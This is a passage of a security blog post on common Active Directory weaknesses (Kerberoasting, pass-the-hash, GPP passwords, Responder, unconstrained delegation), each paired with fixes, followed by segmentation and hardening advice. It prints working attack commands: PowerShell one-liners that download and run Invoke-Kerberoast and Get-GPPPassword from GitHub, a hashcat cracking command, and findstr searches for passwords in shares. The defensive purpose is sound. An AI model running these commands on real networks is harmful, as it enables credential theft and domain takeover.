Intro

Securing Windows environments in a way that prevents lateral movement and/or escalation of privileges has become an incredibly difficult task. The research and tools created in the past 2-3 years have been simply amazing: they helped to identify new attacks and vulnerabilities, while lowering the sophistication required to exploit them. The easiest way to ensure that your environment is built in a secure manner is to rebuild it from scratch with a security architect behind the design. As Microsoft states, once Active Directory has been compromised, it can never be trusted again unless it is possible to return to a known good state. Unfortunately, creating a new environment is usually unrealistic, so in this post I'll focus on identifying common and deadly "flaws" in the current implementation, and provide techniques and procedures that I recommend to increase your cyber maturity and your capability to withstand an intrusion, or limit the impact of one should it occur. The information provided here is by no means "new"; however, it is assembled in a single location, with references (where relevant) to detailed resources on specific topics.

The post is divided in two major parts:

1) Hunting the bad, the evil and the good - Outlines the most common pitfalls I've encountered that allow lateral movement and/or privilege escalation in Active Directory environments.

2) When security meets business - Outlines a proposed design (a list of tasks, if you will) that adds significant value to your security posture while limiting the impact on business operations.

Many of the scripts referenced in this post may be found in this Highway_to_hell repository (they were gathered from multiple locations into one centralized, "easy" to reach place).

1 - Hunting the bad, the evil and the good

Sean Metcalf has written multiple excellent blog posts on adsecurity.org that describe attack methods in Active Directory and common security issues. I highly recommend reading those posts in detail (no really, read them). Below, I'll focus on the ones that I have seen most often in real environments (during engagements), and I highly recommend that everyone reviews and tests for them in their own environment to ensure that they are not vulnerable.

1.1 Kerberoast

This technique (described in depth in here) has been the most common escalation path, in my experience, from a regular user to a privileged one - normally it results in direct escalation to Domain admin. The attack works against accounts that have an SPN registered, as it involves requesting Kerberos service ticket(s) (TGS) for the Service Principal Name (SPN) of the target service account. Part of the returned ticket is encrypted with a key derived from the service account's password, so the password can be attacked offline.

The attack involves 2 steps:

Extraction of Kerberos TGS Service ticket. My "go to" approach is utilizing the PowerShell implementation of Kerberoast, directly from PowerShell Empire's Git repository. I recommend the following command for this, which returns the tickets in ready to crack, Hashcat format, saved to a file named kirb.txt:

iex (new-object net.webclient).downloadstring("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); Invoke-Kerberoast -output Hashcat | Select hash -expandproperty hash > kirb.txt

Cracking the content of kirb.txt offline with Hashcat. Example command:

hashcat -m 13100 kirb.txt -w 3 -a 0 YOURWORDLIST.txt --force

This attack is devastating because:

Many service accounts have passwords with length (most often) set to the minimum in the Domain password policy - in my experience that being 8 characters. Another common observation here is that, because many of the service accounts were created 10+ years ago (yes, I do see this more often than you'd think) and the password has never been changed, they may have a password which is not compliant with the current password policy (e.g. length 6 as that was the requirement when the account was created).

Service accounts are greatly over-privileged, and by "greatly" I mean Domain admin or similar. The usual explanation is that it is "easier" this way - e.g. the account can connect remotely to multiple machines and do its "job", without admins spending time on assigning the bare minimum of required privileges on each device.

Registered SPNs should be reviewed regularly to ensure that only those required for business operations are present.

Fun fact - more than once, I've kerberoasted a service account that is a member of Domain admins and whose SPN was registered for a service/server that is no longer part of the environment.

Fix

Needless to say, the best protection against this attack is to ensure that the account passwords are lengthy. Often, I recommend a Fine-Grained password policy for service accounts, with required length of 32+ characters (in fact, 100+ if possible/supported by the service where the account is used). The following PowerShell script can be used to generate a random password of a chosen length.
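As an illustration of the idea only (this is not the script referenced above), here is a minimal Python sketch of generating a random password of a chosen length. The function name `generate_password` and the choice of character set are assumptions made for this example; some services reject certain punctuation characters, so adjust the alphabet to whatever the target service supports.

```python
import secrets
import string


def generate_password(length: int = 32) -> str:
    """Return a random password built from letters, digits and punctuation."""
    if length < 1:
        raise ValueError("length must be a positive integer")
    # Assumption: the target service accepts all printable ASCII punctuation.
    alphabet = string.ascii_letters + string.digits + string.punctuation
    # secrets uses the operating system's cryptographic random source.
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    print(generate_password(32))
```

The `secrets` module is used instead of `random` because it is intended for security-sensitive values such as passwords.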

This tool, available on GitHub and released by Improsec, checks Active Directory passwords against a list of 517 million weak/leaked passwords. It is a "gold mine" that can help you identify users and service accounts with bad passwords.

1.2 Built-in administrator and Credentials theft (Exposed Admin credentials)

It's no secret that most organizations have a default Windows image, which is installed across all devices in the environment (one for workstations and another for servers). This brings a major security risk if the built-in administrator account (which exists by default) has a shared password across all of those devices (workstations and/or servers). In my experience, it is just a matter of time before you find cached credentials of a Domain admin or similar user on any of the workstations (or servers). If the account's password is shared between workstations and servers, it may be possible to obtain privileged credentials in a single "hop" to a server where a Domain admin is logged on (e.g. Management server, Exchange, File server etc).

Obtaining the password hash for a local user, which is stored in the SAM registry hive on the Windows machine, is a no-brainer if you are running with administrative rights on the system. Here's an example:

The obtained (NTLM) password hash can either be used directly to remotely authenticate to another system (which has the same password for the administrator's account) or it may be cracked offline first to get the plain-text password and then perform remote authentication with it - it doesn't make a difference whether the hash value or the plain-text password is used. You may be wondering at this point, what if there is another local administrative user that exists on all workstations, which is not the built-in administrator? It's bad, clearly. However, with the newest Windows workstation versions, those accounts are subject to many network restrictions, which makes them less attractive/useful - for more details read the blog post by Harmj0y. More information was also released here and here by Microsoft.

As mentioned above, this password hash can be used to remotely connect to any machine (over protocols such as SMB, WMI or even RDP) on which the account has the same password. This brings in the entire concept of Credential theft, where you connect to as many machines as possible and dump logon passwords (in clear-text) cached in the memory of the remote machines. Mimikatz is a tool that scrapes the memory and locates the logon passwords of all users who have logged in since the last time the machine was rebooted (though this should not be possible on newer Windows versions or older ones that have KB2871997 installed). The approach of credential theft has enabled a whole new way of privilege escalation, by abusing the identity of the compromised users (compared to hacking only into vulnerable systems). Credential theft completely changed the Penetration testing game, as most of the engagements follow the same approach. It became so over-abused that there are attempts to automate the entire process, with tools such as DeathStar. An example of abusing the built-in administrator account (pass-the-hash approach) to connect to a remote system and dump credentials from memory is shown below, where we obtain the credentials of "slavi-adm" (note the long, complex password, which is presented in plain text back to us), who is a Domain administrator. The attack is trivial to perform with the tools available - I've utilized CrackMapExec for this purpose but there are many other tools:

Fix

There are several problems that lead to the escalation described above. First of all, in order to obtain the built-in Administrator's password hash, administrative privileges are required. Therefore, users running under administrative privileges should be a no-go (even if it is only on their own workstations!). And yet, while this does not guarantee 100% that an adversary will not be able to escalate their privileges, it will make their job harder.

Next, the administrator's password being shared among the workstations is definitely a flaw. If this account is not used, it should be disabled and/or prevented from connecting over the network. This can be distributed as a "User right assignment" setting, through a Group Policy Object. However, the most obvious solution is to utilize the free tool that Microsoft released - Local Administrator Password Solution (LAPS). It automatically sets the built-in Administrator's password to a random value and rotates it every X days (X is defined by you). The password value is stored in an attribute of the computer object in Active Directory, where by default, only Domain Admins have the rights to read it (delegation to other users/groups is, of course, possible).

Finally, the Credential theft of the password of "slavi-adm" was only possible because that (privileged) account had logged in to an untrusted system, which could be accessed by users with far fewer privileges.

The passwords cached in memory belong to every user who has logged in since the last reboot of the machine (assuming the machine does not have the previously mentioned KB2871997 installed), not just to users actively logged in at the time of the script execution. Clearly, if there were no credentials stored, we could not steal anything from this machine. There are 2 remarks I would like to outline here though:

Caching credentials can occur under multiple authentication providers. The most common and abused is the Wdigest one; however, in the latest Windows desktop and server versions, this authentication package will not cache credentials by default. The problem with the implemented "fix" is that it is controlled by a registry key's value. If an adversary obtains administrative privileges on the machine, they can flip the value in the registry and the machine will happily start caching credentials. However, I have observed a common problem with servers. This registry key (seemingly) affects only the Wdigest package, so the other authentication providers do cache credentials if a certain type of connection occurs. I have seen more than once that the "tspkg" authentication package holds plain text credentials (I am not sure about the reason behind this behavior) on machines with KB2871997 installed.

Let's assume for a second that there are no cached credentials on that server but the account "slavi-adm" is still logged in. There is a possibility (and this will not be fixed in any way as far as I know) for an account with local administrative rights to connect to (or rather - hijack) an RDP session of another user, without knowing that user's password! When I first heard about this, it blew my mind. The "RDP Hijack" attack was initially explained in the following post, and the rest is history, as some may say. What does this mean from a security and user management perspective though? Here is an example - imagine that you have a student employee who has access to only one server in the environment, on which he has local administrator rights. That account (whether it is the student using it or a malicious adversary) has the capability to perform either of the 2 points described above and escalate to e.g. Domain administrator, if such a privileged account is also logged on to the server.

The above 2 points are a great argument for why you should NOT assign administrative rights (especially if no second factor is required for remote authentication) and NOT provision membership (definitely not permanently) in privileged groups.

In Windows 10/2016 Microsoft have introduced new protections against credential caching, known as "Windows Defender Credential Guard" and "Remote Credential Guard", which should be utilized where possible (where possible because there are hardware requirements).

Moreover, privileged accounts (both builtin groups such as Domain admins and other custom delegated groups) should not be allowed to login or access regular workstations and servers. This can be achieved by denying Network, Interactive and RDP logins for them.

If you are interested in security features in Windows 10 and Server 2016 - Microsoft provides free courses on the edX platform named "Microsoft - INF258x Windows 10 Security Features" and "Microsoft - INF259x Windows Server 2016 Security Features".

1.3 Insufficient Patching

Lack of patching is commonly exploited to perform lateral movement and privilege escalation - referring both to patching at the Operating System level and to patching of network services. Let's break this down into 2 separate categories:

Operating System

It wasn't long ago that we saw (and some experienced) the most devastating cyber intrusions of all time due to unpatched OS - initially WannaCry and then NotPetya, both utilizing the same exploit (there were differences in the way they propagated though). I will not speculate on who developed the exploit, but the consequences were catastrophic for both the public and the private sector because of a lack of (or insufficient) patching. Microsoft released patches in March 2017, while the massive exploitation started in May (for some reason, this didn't start as soon as the exploits were publicly available, which could've been a lot worse than what we saw).

Now, 2 years later, it is still common to run across systems that are not patched - including Domain Controllers! The scenarios from here are:

- exploit unpatched servers to move laterally and utilize credential theft until you stumble upon cached privileged credentials (as mentioned earlier, it's usually a matter of time in a non-hardened environment)

- exploit unpatched Domain Controller(s), which will directly grant full forest dominance (potentially cross-forest, as mentioned further down)

Exploitation could be done either by using Metasploit or these python scripts.

Network services / Third-party software

While some may argue that their OS are all up to date (as in fully patched), having vulnerable software that listens on the network is often as bad. I often see Tomcat, Jenkins and friends that were installed on port 8080 years ago and have never been updated. Other than being unpatched, these often run with default configuration (e.g. admin:admin credentials) or with publicly available critical Remote code execution exploits. Exploiting any of these results in SYSTEM level access on the Operating System, which again brings in the Credential theft scenario (among others, e.g. locating stored passwords on the server or in domain shares, assuming that the server is domain-joined).

Fix

"Patch Patch Patch ..."

The best way to identify unpatched systems is by doing vulnerability scans. Vulnerability scans should be performed additionally after each patch window, to verify that updates were installed successfully (also from a compliance point of view to satisfy auditors, although compliance != security). My recommendation is to run automated scans weekly.

Another invaluable 'task' is system hardening and network isolation, which may reduce the risk of compromise of unpatched systems or services - more details later on.

1.4 Group Policy Preferences

Sean Metcalf described this one in great detail in his blog post. The problem is that once upon a time, credentials were stored encrypted in GPO files, and Microsoft published the decryption key that was used to protect them. The exploitation of this involves scanning GPO XML files in the Domain's SYSVOL to identify if any of those XML files contain credentials, and if so, decrypting them. This is fully automated with the following PowerShell script and is as simple as executing the following PowerShell command:

iex (new-object net.webclient).downloadstring("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1"); Get-GPPPassword

I've seen both the built-in administrator's password and privileged domain user account passwords being exposed here.

Fix

Delete existing GPP xml files in SYSVOL that contain passwords. Remember to change the passwords of accounts that have been exposed.
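To verify the clean-up, the SYSVOL folder can be searched for any XML file that still carries a non-empty `cpassword` attribute, which is where Group Policy Preferences stored the encrypted value. The Python sketch below only locates such files and does not decrypt anything; the function name `find_gpp_passwords` is an assumption made for this example, and the SYSVOL path (e.g. a UNC path to your domain's SYSVOL share) is supplied by you.

```python
import re
import sys
from pathlib import Path

# Matches a non-empty cpassword="..." attribute in a GPP XML file.
CPASSWORD = re.compile(r'cpassword="([^"]+)"', re.IGNORECASE)


def find_gpp_passwords(sysvol_root):
    """Yield (path, encrypted_value) for each non-empty cpassword attribute."""
    for xml_file in Path(sysvol_root).rglob("*.xml"):
        try:
            text = xml_file.read_text(encoding="utf-8", errors="ignore")
        except OSError:
            continue  # unreadable file: skip it rather than abort the scan
        for match in CPASSWORD.finditer(text):
            yield xml_file, match.group(1)


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage (path is an example): python gpp_scan.py \\contoso.local\SYSVOL
    for path, _value in find_gpp_passwords(sys.argv[1]):
        print(f"cpassword still present in: {path}")
```

Any file reported here should be removed or cleaned, and the affected account's password changed.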

1.5 Plain text passwords in network shares and object attributes

Some may think that this is nonsense, but you would be surprised how often network shares contain credentials embedded in plain text files, scripts and old backups or virtual machine images. I overlooked this at first, as I assumed people (in the IT sector at least) are more cautious than this, but reality has proven otherwise. My common approach is running PowerView to discover network shares and DFS shares in the environment - e.g. the following commands:

Invoke-ShareFinder

Get-NetFileServer

Get-DFSshare

There are multiple approaches from here onwards; the simplest one is using the built-in Windows command "findstr". An example command is shown below:

findstr /s /i /m "pw" \\SHARE\PATH\*.<FILEEXTENSION>

findstr /s /i /m "pass" \\SHARE\PATH\*.<FILEEXTENSION>

where "pw" and "pass" represent the strings to look for in files - be creative and come up with more, especially if your language is not English. "\\SHARE\PATH" represents the share location which was discovered by PowerView. <FILEEXTENSION> represents the files you want to look into - you can leave this as wildcard character as well, but often due to the excessive amount of files in shares, the command may take days/weeks to finish executing and it will false-flag binary files/archives in its output. The most common suspects are the file extensions - .txt, .ini, .config, .ps1, .bat, .cmd, .cmdline, .xml and .vbs. So a final command to execute could look like (try at least with all extensions mentioned here - others may be relevant too e.g. .php/.aspx ... and so on):

findstr /s /i /m "pass" \\FileServer01\Scripts\*.ini
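Running one findstr command per extension and keyword gets tedious, so the same search can be scripted. The following Python sketch is an approximation of `findstr /s /i /m` over several extensions and keywords at once; the function name `files_mentioning` is an assumption for this example, while the keyword and extension lists are the ones mentioned above.

```python
import os
import sys

KEYWORDS = ("pw", "pass")
EXTENSIONS = {".txt", ".ini", ".config", ".ps1", ".bat", ".cmd",
              ".cmdline", ".xml", ".vbs"}


def files_mentioning(root, keywords=KEYWORDS, extensions=EXTENSIONS):
    """Return paths under root whose content contains any keyword (case-insensitive)."""
    needles = [k.lower() for k in keywords]
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            # Skip everything except the chosen extensions (avoids binaries/archives).
            if os.path.splitext(name)[1].lower() not in extensions:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as handle:
                    content = handle.read().lower()
            except OSError:
                continue  # no access or file vanished: move on
            if any(needle in content for needle in needles):
                hits.append(path)
    return hits


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage (share path is an example): python share_scan.py \\FileServer01\Scripts
    for hit in files_mentioning(sys.argv[1]):
        print(hit)
```

Like `findstr /m`, it prints only the file names, so the matches still need a manual review.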

Other than passwords in shares, it is common to find passwords in attributes of user, computer and group objects in Active Directory. The ones I have seen are in the "description" and "info" fields. The following scripts can be used as inspiration - user attributes and group attributes.

Fix

Remove all files containing credentials in plain text from network shares.

1.6 Capturing password hashes on the network

Responder is a powerful LLMNR/NetBIOS/WPAD (and others) poisoner, which captures password hashes on the network. 4Armed released a great blog post describing how the tool works with detailed examples. Depending on the type of password hashes captured (NTLMv1, NTLMv2 etc), you may be able to utilize them for remote connections (Pass-the-hash) directly instead of having to crack them offline. Nonetheless, with a password policy requiring users to create passwords of length 8+ (which usually results in passwords of length exactly 8), there is a great chance of cracking the captured hashes (it really is a matter of a good password cracking dictionary). A side note - an 8 character password length is quite insufficient. With a relatively affordable setup, you may achieve password cracking speeds of 100 billion attempts per second or higher for NTLMv1, which makes it feasible to completely brute-force all possible 8 character combinations. In fact, in my personal experience, Responder has helped to achieve lateral movement/escalation of privileges in every engagement in which I've used it.
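To put the brute-force claim into numbers, here is a short worked calculation in Python. It assumes a character set of the 95 printable ASCII characters and the cracking speed of 100 billion attempts per second quoted above; both are inputs you can change, and the function name `brute_force_hours` is made up for this example.

```python
def brute_force_hours(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Hours needed to try every password of exactly `length` characters."""
    keyspace = charset_size ** length
    return keyspace / guesses_per_second / 3600


# Assumption: 95 printable ASCII characters, 100 billion guesses per second.
hours = brute_force_hours(95, 8, 100e9)
print(f"8 characters: {hours:.1f} hours")  # prints "8 characters: 18.4 hours"

years = brute_force_hours(95, 14, 100e9) / 24 / 365
print(f"14 characters: {years:.2e} years")
```

Under these assumptions, the complete 8 character keyspace falls in well under a day, while every additional character multiplies the effort by 95.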

Just to make things worse, the NTLMv2 hashes, although unusable for pass-the-hash directly, can be either cracked offline or relayed. In a successful man-in-the-middle scenario, instead of capturing those hashes for later cracking, you have the opportunity to relay them to a server, and that server will authenticate you as the user to whom that NTLMv2 hash belongs! For example, if you relay a Domain admin's password hash to a Domain controller, you will authenticate as that account and can execute any command that you desire. If this caught your attention - you can read the following post for a more detailed explanation.

Fix

Disable broadcasting protocols such as LLMNR, NetBIOS etc (they are outdated, and unlikely to be needed in modern environments). To mitigate relaying attacks, enforce/require SMB Signing on all servers (also LDAP signing). Require NTLMv2 password hashes on remote connections.

Educate users towards using pass phrases instead of passwords. Enforce a technical control for regular user password length to be at least 14 characters, and 20 or more for any user that has administrative rights. This length requirement, will also get rid of "weak" but otherwise compliant passwords with short length password policy such as "Winter2019", "January2019" etc. This script linked previously can identify weak passwords across all users in Active Directory.
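To illustrate what "weak but otherwise compliant" means in practice, the following Python sketch flags passwords built from a season or month name followed by a year. It is only a toy filter under the assumption of English season and month names (not a replacement for checking against leaked password lists), and the function name `is_predictable` is made up for this example.

```python
import re

# Assumption: English season and month names; extend for your own language.
WORDS = [
    "winter", "spring", "summer", "autumn", "fall",
    "january", "february", "march", "april", "may", "june", "july",
    "august", "september", "october", "november", "december",
]

# A word, then a 2-4 digit number, then optional trailing symbols such as "!".
PATTERN = re.compile(
    r"^(?:%s)\d{2,4}[^A-Za-z0-9]*$" % "|".join(WORDS),
    re.IGNORECASE,
)


def is_predictable(password: str) -> bool:
    """Return True for passwords of the form <season or month><year>[symbols]."""
    return bool(PATTERN.match(password))


for candidate in ("Winter2019", "January2019", "Summer19!", "correct horse battery staple"):
    print(candidate, is_predictable(candidate))
```

All of the first three candidates satisfy a typical "8 characters, upper, lower, digit" policy, which is exactly why a length requirement and a pass phrase habit help.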

1.7 Users, privileges, group delegation

Regularly reviewing active accounts and their privileges should be a top priority (ideally, a SIEM will alert on attempts to use disabled privileged accounts or identify anomalies with enabled ones). Default Active Directory groups should not be used, and their permanent members (2-3 people) should only be those with an actual need to log in to Domain controller(s), and for disaster recovery scenarios. Getting user (and computer) information can be achieved with New-ADReport, which will extract the most sensitive attributes into a CSV file. Important information that the script captures includes:

Domain/Forest functional level

Number of members in privileged AD groups

Overview of enabled/disabled user and computer accounts

Users' attributes - last password change, password does not expire, last login, trusted for delegation, password not required and more

Another good resource is PingCastle. It performs additional checks (also some of the described earlier in this post such as Group Policy Preferences) and automatically scores the security of the domain from 0 to 100, based on what it discovers.

Neither of those tools, though, has the capability to discover delegated permissions that shouldn't be there. This is where SharpHound/BloodHound shines bright and visualizes the delegation between groups and user permissions. It goes a step further and has the capability to discover escalation paths, for example, from "Domain users" to "Domain admins". Needless to say, nearly every time after running the tool I have discovered some kind of escalation path that in policy/theory should not exist - some were directly from "Domain users" to privileged groups, others had delegated access to "Domain Computers", and they were indirectly (through a long chain of 4-6 groups in between) members of groups such as "SCCM Admins". SharpHound will also look at the access of every user and discover if that user has any access to other machines or escalation paths to privileged users and groups. One of my favorite examples was when it discovered that "Domain users" were granted permission over the Domain's Active Directory object, so that any "Domain user" could assign themselves "Replicating Directory Changes All" and "Replicating Directory Changes" rights, which gives them the ability to do DCSync and extract all password hashes in the domain (and in practice, of the forest through abusing Golden tickets).
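The idea of an "escalation path" through a chain of groups can be pictured as a shortest-path search in a graph, where an edge means "is a member of" or "has control over". The Python sketch below is a toy illustration of that concept and not how the tool itself is implemented; the edge list is entirely hypothetical and the function name `find_path` is made up for this example.

```python
from collections import deque


def find_path(edges, start, target):
    """Breadth-first search: return the shortest chain from start to target, or None."""
    graph = {}
    for source, destination in edges:
        graph.setdefault(source, []).append(destination)
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        node = path[-1]
        if node == target:
            return path
        for neighbour in graph.get(node, []):
            if neighbour not in seen:
                seen.add(neighbour)
                queue.append(path + [neighbour])
    return None


# Hypothetical nested memberships/delegations, invented for this example.
edges = [
    ("Domain Users", "Helpdesk"),
    ("Helpdesk", "Workstation Admins"),
    ("Workstation Admins", "SCCM Admins"),
    ("SCCM Admins", "Domain Admins"),
    ("Domain Users", "Printer Operators"),
]

print(" -> ".join(find_path(edges, "Domain Users", "Domain Admins")))
# prints "Domain Users -> Helpdesk -> Workstation Admins -> SCCM Admins -> Domain Admins"
```

None of the individual memberships looks alarming on its own; it is the chain as a whole that grants the escalation, which is why a manual review of single groups tends to miss it.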

Fix

The best I've encountered as a solution to managing privileged accounts is to implement Active Directory administrative Tier model with separate Privileged workstations for administrators. If properly implemented, the risk of the credential theft scenarios can be reduced significantly. Moreover, due to the tier segregation, should a cyber intrusion occur, it will be limited to a compromise only to that specific tier (or part of it) and should not expose the rest of the infrastructure (at least from Active Directory perspective - but read the next points).

1.8 The forest is no longer a security boundary

Until recently, many of us (if not all) thought that an Active Directory forest is a security boundary since that is what Microsoft have claimed for years. However, recently in a blog post, a great attack scenario was discovered, where the researchers managed to "breach" the claim and compromise another forest as quoted:

"the compromise of any server with unconstrained delegation (domain controller or otherwise) can not only be leveraged to compromise the current domain and/or any domains in the current forest, but also any/all domains in any foreign forest the current forest shares a two-way forest trust with!"

The requirements for the above are that:

An adversary has compromised a machine that is trusted for unconstrained delegation

Domain controller(s) in a different domain/forest have the Print spooler service running (enabled by default on Windows Servers)

There is a two-way trust between the domains/forests

Security professionals have been saying for years that unconstrained delegation is a serious risk (read here and here), but the attack above makes it far worse! What this means in reality is that compromising a single machine that is trusted for unconstrained delegation in a (probably very old) test forest can compromise your entire production forest!

Fix

The first step is to identify machines that are trusted for unconstrained delegation, and verify whether the delegation is still required. If not, simply remove it. Another step is to disable the Print Spooler service on servers (that are not print servers, clearly), which should be part of a server hardening procedure. While this is not a foolproof approach, it adds a tiny bit to the "Defense in depth" approach.

Should unconstrained delegation be needed, I would consider removing forest trusts and treating those machines with caution regarding what access to them has been provided, and to whom.

1.9 Abusing Exchange Servers

Just a couple of days ago, an interesting blog post was released, where the author abuses Exchange and its default over-privileged groups to escalate privileges from those of a regular Domain user to Domain admin. If you have Exchange servers present in your environment, I urge you to ensure that you have mitigating controls in place and are not vulnerable, as that is quite a devastating "flaw". The attack has been confirmed against the following Exchange versions - 2013, 2016 and 2019.

Fix

Sean Metcalf released a detailed explanation of the problem and the solution here.

2 - When security meets business

Unfortunately for us "the security guys", the perfect security design is also the perfect disaster for operating the business. We can't simply implement every "new buzz-word" feature or disable old ones while ensuring that the business required systems and processes function as expected. This is why, I suggest the topics outlined below to be part of your AD management, but it is up to you to decide the depth of implementation.

A great starting point for improving cyber maturity is the CIS Critical Security Controls, which I am a big fan of, but they are by no means a complete "solution". Being compliant with such a framework is a good way to structure goals and tasks, and perhaps define a roadmap. But in reality, you may be 5 out of 5 compliant with those controls while having a single misconfiguration which allows for direct user escalation. Such flaws can only be identified by technical tests (e.g. the ones mentioned in the previous section).

2.1 Network protection and segmentation

Before we talk about any design of AD, we need to create a plan of how the network should be segmented. Unfortunately, most networks are just "flat" - from any location on the network you can access any other device without any restrictions, regardless of its physical location (e.g. America/Europe etc). Many times, I have seen segmentation being misunderstood and thought of as separate VLANs for different office locations, with no filtering/restrictions placed in between them. It's great that by seeing an IP address range we can tell where the machine physically is, but that doesn't quite help regarding the security of the network.



It will, of course, be impossible to completely lock down each VLAN, but we have the possibility to really narrow it down to the specific ports that need to be accessible. An example is shown below in an oversimplified diagram:

In this example, the entire network is "broken" down into multiple segments, and communication is allowed only between the specific segments that require it. The communication itself is also limited to specific ports. Because of this restriction, if malware or an adversary attempts to exploit MS17-010 vulnerable machines or to laterally move to a remote machine through protocols such as SMB/WMI, they will not succeed, as that connection will be dropped on the network level and never reach the remote machine. Note the "IT Management" subnet. Ideally all administrative access to any device (Windows / Linux / Network) should originate from here, and this should be the only VLAN that is allowed to access the management ports of those devices. In many cases, it will also be the only VLAN which is allowed to RDP into other VLANs (RDP exceptions are common and we cannot avoid them, but they should also be limited, e.g. a regular developer might have his own server machine in a developer's network segment, so the Workstation subnet will need RDP access to that specific server). Network segmentation plays a huge role in the "Defense in depth" protection, as it significantly reduces the risk of a single attack that may successfully compromise the entire organization (especially if it is automated). To strengthen the access to remote machines, the RDP connections on port 3389 should be protected by multi-factor authentication.
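The filtering logic described here is a default-deny allow-list: a connection passes only if its exact source segment, destination segment and port have been approved. A minimal Python sketch of that decision is shown below. The "IT Management" and "Workstations" names come from the example above, while the "Servers" and "Developers" segments and the individual rules are assumptions invented for illustration; a real firewall policy would of course live on the firewall, not in a script.

```python
from typing import NamedTuple


class Rule(NamedTuple):
    source: str
    destination: str
    port: int


# Hypothetical allow-list; anything not listed is dropped.
ALLOWED = {
    Rule("IT Management", "Servers", 3389),       # RDP for administration
    Rule("IT Management", "Workstations", 3389),
    Rule("Workstations", "Servers", 443),         # web applications only
    Rule("Workstations", "Developers", 3389),     # limited RDP exception
}


def is_allowed(source: str, destination: str, port: int, rules=ALLOWED) -> bool:
    """Default deny: permit only connections that match an explicit rule."""
    return Rule(source, destination, port) in rules


print(is_allowed("IT Management", "Servers", 3389))  # prints "True"
print(is_allowed("Workstations", "Servers", 445))    # prints "False" (SMB is dropped)
```

With rules like these, an SMB-based worm or a lateral movement attempt from the workstation segment never reaches the servers, regardless of whether they are patched.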

In an advanced setup, you may define specific set of workstations/servers that may communicate to other ones with mutual authentication required prior to the connection being established. This can be achieved through the implementation of Public key infrastructure (PKI) and utilization of advanced features of the Windows host firewall. In other words, in the firewall of the server "devserver01.contoso.local" you may define that only workstations that have the certificate "developer in contoso" are allowed to initiate a connection.

It goes without saying that many, if not all, of the servers should not have direct Internet access. Should one require it, again at a firewall level, you can allow access only for that server and only to a specific remote location (not any!).

Other than restricting access between subnets, I recommend disabling peer-to-peer connections in the "Workstations" subnet itself. In a normal office environment, workstations rarely (probably never) need to communicate with each other directly. Moreover, the previously mentioned PKI can also be used to ensure that only devices issued by your organization can join the network. Implementing certificate-based 802.1x will allow devices to connect only if they authenticate by presenting a company issued certificate. This reduces the risk of physical intrusions that "attach" a device to the network. The same PKI can also be used to perform SSL inspection at the firewall level, to decrypt and inspect SSL traffic. The inspection can be performed by an Intrusion Detection and Prevention system, which is usually a firewall add-on/component. Enabling the firewall's security services is yet another added layer of protection, and in many cases it may identify threats before they reach the end devices.

2.2 Device security hardening

By default, Windows installations are meant to support a wide range of functionality that makes it easier for many of Microsoft's customers to set up and configure services without technical knowledge. This default installation, and the features it brings, are anything but secure.

Windows 10

If you think about it, employee workstations are where, in most cases, the initial compromise occurs during a breach. This is reason enough to ensure that they are properly hardened, to reduce the attack surface and the potential ways of compromising them.

The best article I've seen on the topic is the one that Sean Metcalf published on his blog on Securing Windows Workstations. The following is a list of a few measures that I can't recommend enough (think of this as a fundamental, must-have starting point!):

Implement Microsoft's security baselines - download here. The settings that you need to alter here are primarily under "User Rights Assignment", where you can define who (group or individual) can access the workstations and which types of logon they are allowed or denied. The most obvious change should be that no default privileged AD groups are allowed to log in to the workstations (yes, this means that Domain Admins and friends should be denied login to a workstation)! What I also like is creating a group in AD for every workstation, following a common naming convention such as %hostname%-admins, and then adding that group to the "Administrators" group on the workstation through a GPO. Going forward, should anyone require administrative access on a workstation, I can assign it centrally from Active Directory, probably for a limited time, by controlling who is a member of those groups. Moreover, this gives me visibility across all workstations over who has administrative access and on which ones exactly. An added benefit is the possibility to alert on any user or group added to the Administrators group on a workstation that is not a member of %hostname%-admins for that device, as there should be none.
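The alerting idea at the end of the previous paragraph can be sketched roughly as follows. This is only an illustration: the function names are made up, the list of local Administrators members is assumed to have been collected by some other tool, and I assume that the built-in Administrator account is part of the expected baseline.

```python
# Principals expected in every workstation's local Administrators group.
# Assumption: only the built-in Administrator account; adjust to your baseline.
BASELINE_MEMBERS = {"administrator"}


def expected_admin_group(hostname):
    """Build the per-workstation AD group name, e.g. WS042-admins."""
    return f"{hostname}-admins"


def unexpected_local_admins(hostname, members):
    """Return members of the local Administrators group that should not be there."""
    allowed = BASELINE_MEMBERS | {expected_admin_group(hostname).lower()}
    unexpected = []
    for member in members:
        # Strip an optional DOMAIN\ or HOSTNAME\ prefix before comparing.
        short_name = member.split("\\")[-1].lower()
        if short_name not in allowed:
            unexpected.append(member)
    return unexpected
```

For a workstation named WS042, anything other than the built-in account and WS042-admins would be returned and could be raised as an alert in the SIEM.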

Employees and Administrative access don't work well together. Do not assign administrative rights to a regular employee's account, even if it is only on their own workstation. If some (or all) employees must have that privilege, create a second account for them, which is a member of the group %hostname%-admins and can log in interactively on the machine, while disabling the "RunAs" feature. In other words, to use that account, an employee will have to either "Sign out" or "Switch user" from the current session of their regular account, and then separately/interactively sign in with the administrative account.

Sysmon (or another tool with similar capability) logs are a gold mine for Incident Responders. This tool captures every process creation, every added/deleted/modified registry key, every network connection etc., which gives incredible visibility into what is happening on each device. The problem with Sysmon is that it can generate A LOT of logs, so it requires time to tune its configuration. The most famous configuration, and a great starting point, is the one that SwiftOnSecurity maintains on her github repository. I also like this one here. The configuration file can be changed to exclude certain types of logs that are "regular" behavior for your environment. I will get back to this in the part regarding SIEM.

